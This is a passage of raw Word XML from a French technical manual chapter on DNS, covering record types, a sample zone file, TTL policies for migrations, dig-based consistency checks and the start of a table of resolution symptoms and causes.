                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>www 300 IN A 203.0.113.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="174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AAAA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Adresse IPv6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="407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www 300 IN AAAA 2001:db8::10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1745"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CNAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Alias vers un autre nom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4071"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>blog IN CNAME www</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="174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MX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Serveur de messagerie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="407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 IN MX 10 mail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1745"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>TXT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Texte libre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4071"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SPF, vérification de domaine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="174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NS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Serveurs de la zone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="407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 IN NS ns1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1745"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SRV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3199"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Service et port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4071"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>_https._tcp IN SRV 0 5 443 www</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="174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CAA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="319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Autorités de certification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="407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 IN CAA 0 issue "letsencrypt.org"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une zone complète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Zone exemple.fr</w:t>
        <w:br/>
        <w:t>$TTL 3600</w:t>
        <w:br/>
        <w:t>@   IN SOA ns1.exemple.fr. admin.exemple.fr. (</w:t>
        <w:br/>
        <w:t xml:space="preserve">        2026031401 ; numéro de série</w:t>
        <w:br/>
        <w:t xml:space="preserve">        7200       ; rafraîchissement</w:t>
        <w:br/>
        <w:t xml:space="preserve">        3600       ; réessai</w:t>
        <w:br/>
        <w:t xml:space="preserve">        1209600    ; expiration</w:t>
        <w:br/>
        <w:t xml:space="preserve">        300 )      ; TTL négatif</w:t>
        <w:br/>
        <w:br/>
        <w:t>@       IN NS   ns1.exemple.fr.</w:t>
        <w:br/>
        <w:t>@       IN NS   ns2.exemple.fr.</w:t>
        <w:br/>
        <w:t>@       IN A    203.0.113.10</w:t>
        <w:br/>
        <w:t>www     IN A    203.0.113.10</w:t>
        <w:br/>
        <w:t>api     IN CNAME www</w:t>
        <w:br/>
        <w:t>@       IN MX   10 mail.exemple.fr.</w:t>
        <w:br/>
        <w:t>@       IN TXT  "v=spf1 mx -all"</w:t>
        <w:br/>
        <w:t>mail    IN A    203.0.113.20</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SOA</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Start of Authority : enregistrement qui identifie le serveur primaire, l'administrateur, et les durées de rafraîchissement. Son numéro de série doit augmenter à chaque modification, sinon les serveurs secondaires ne se mettent pas à jour.</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CNAME N'EST PAS UNIVERSEL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un CNAME ne peut pas coexister avec d'autres enregistrements au même nom. On ne met donc jamais de CNAME à la racine du domaine (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>@</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">) : utilisez un enregistrement </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AAAA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, ou un mécanisme d'alias fourni par le gestionnaire de zone.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>56.4 TTL et propagation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le TTL indique combien de temps un résolveur peut conserver la réponse. Un TTL long réduit le trafic ; un TTL court accélère les changements. « La propagation » n'est rien d'autre que l'expiration progressive des caches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.196 — Cinq politiques de TTL</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90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Contexte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="261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TTL conseillé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="348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Raison</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2908"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Enregistrement stable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2617"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>3600 à 86400</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3489"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Peu de requêtes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="290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Avant une migration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="261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300</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="348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Bascule rapide</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2908"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Après migration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2617"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>3600</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3489"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Retour à la normale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="290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Service critique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="261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60 à 300</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="348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Bascule en cas d'incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2908"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Enregistrement expérimental</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2617"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3489"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Itération</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Deux vérifications de cohérence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Vérifier depuis plusieurs résolveurs publics</w:t>
        <w:br/>
        <w:t>for r in 1.1.1.1 8.8.8.8 9.9.9.9; do</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo "— $r"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  dig @$r +short www.exemple.fr</w:t>
        <w:br/>
        <w:t>done</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier le TTL restant</w:t>
        <w:br/>
        <w:t>dig www.exemple.fr | grep -A1 "ANSWER SECTION"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Baisser le TTL à 300 secondes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>avant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> une migration évite une fenêtre de plusieurs heures pendant laquelle une partie des visiteurs atteint encore l'ancienne adresse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>56.5 Diagnostiquer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Trois symptômes reviennent : le nom ne résout pas, il résout vers la mauvaise adresse, ou la résolution est lente. Chacun a des causes distinctes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.197 — Cinq symptômes et leurs causes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43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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="329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Cause probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="329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Vérification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2432"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>NXDOMAIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Nom absent ou faute de frappe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3291"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dig</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> sur la zone</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
